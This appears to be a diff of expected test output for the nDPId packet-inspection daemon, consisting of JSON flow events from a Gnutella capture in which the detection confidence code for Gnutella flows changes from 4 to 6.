00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":320292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320292,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4CAEAAIARw78KAAIPcHfybnAJ6ecAJJt6ZMkxArsJiWn\/2NtEIIr3AwABAAUAAADDglFLQA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4sK0AAIARXRsKAAIPMjruo3AJGcIAJO3IbAsxAnYtXYL\/8bz\/pBe7AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA419wAAIARwSYKAAIPTL1I5nAJH+EAJBtk6eoxAtFG13r\/NLEu9DR8AwABAAUAAADDglFLQA=="} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":101122,"flow_last_seen":134428,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95754,"flow_last_seen":139756,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":160009,"flow_last_seen":163034,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 